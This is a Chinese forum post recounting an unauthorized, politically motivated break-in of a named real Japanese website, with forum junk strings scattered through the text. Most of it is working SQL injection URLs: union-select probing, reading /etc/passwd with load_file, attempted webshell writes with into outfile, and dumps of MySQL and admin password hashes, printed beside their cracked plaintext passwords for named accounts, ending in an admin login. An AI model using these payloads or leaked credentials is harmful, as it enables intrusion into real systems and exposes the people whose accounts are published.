原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据
$ C4 _1 y3 i7 p( c* n
( I& P  N2 {& a- i! \+ v, V3 Y
% B! D7 Y1 a5 a: x' a( A8 m4 P0 C# ^whatweb
  E' H# p' s+ i6 ?
+ ^9 X. }' a7 |) Z4 j9 Y
! P- M6 r$ s: |3 N利用NMAP扫描

" c7 e4 }7 a8 d$ m' e中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
( B+ I  d, O( ^) n1 e% A3 K5 m找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
+ G) o( T4 o9 {. U$ E8 }/ W; H

0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常
; f) G! }3 J$ G& q* z
0x04.   union手动查询
6 r: [; b; a: S1 l2 _4 ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
! ]8 o' X$ V! ?6 T. |
/ t. O# G, b, w. x, o中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

7 ?0 {/ @/ o: V0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
- H0 _* T: B) Z' E1 h# j! gdatabase:    openpne
version:      4.1.22
os:             portbld-freebsd5.4

% |  A+ }: v( U. F: I0x06. root用户
" `( B6 }1 ^6 M" \2 O利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
+ _1 p- V; r% ^' p3 P# W* [
* p' t3 B: v; S5 v# C+ t0 L通过工具转换
1 \: O( Q- k* r) P
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
* E( a; M  ]  f0 G3 h0 _
0x07. 利用 into outfile
全部都失败
+ D3 }/ u3 t- U$ Y  Nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

5 J3 p) q; u8 g* a; k" Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
) c1 A$ ]8 ^$ }. l. E
0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

9 b9 D% P+ _' E3 G2 j5 ]1 h- w

0x09. 查找后台
% k8 @, |8 W: i* n& e, K' y$ P利用 现有的各种 后台工具尝试都不行

4 ~- ]8 e2 W3 J9 U0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
. [# v6 m& T& U" ~/ v可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
1 V% M: y9 n" G4 ]3 m9 Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

. O% C5 ]3 v5 H! u/ J  j- u这个可以在 www.cmd5.com 解密
9 {2 ~2 a! o( _- Droot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
# @8 ?8 }* u6 Wchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
1 W1 ^1 Z! V, M2 Gopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
" k4 ^6 @) ~4 x" H  w; v

0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

# P. |' V. w: _+ ~4 n( T6 k  G/ A
0x12. 默认信息利用
( m) N; e$ \& y) W4 q* Chttp://sns.zuaa.jp/?m=admin&a=page_login
: g3 K* A! C/ P5 |% M1 W+ }
表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

7 M  A; v6 w) H( ^解密
: z, M8 o0 _' y* W! m$ kzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
" a' U; v  I* J: L6 I: D, u5 i
6 d; I) Y  g! V" M- u2 G( W中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 `# `. `! T- E# X
9 ^" f0 a  o( ?0x13. 登录后台
, M/ M3 l" ~7 G( h% s( ]& E

9 q1 j. o, v9 U: W- k7 a/ r7 b4 B
0x14. 小结
4 J, D2 @! h4 Y9 @- O0 @. a利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
: J( T. ]* @0 ~1 `感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
' N: H7 g, H: O9 s; F! Z0 l
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的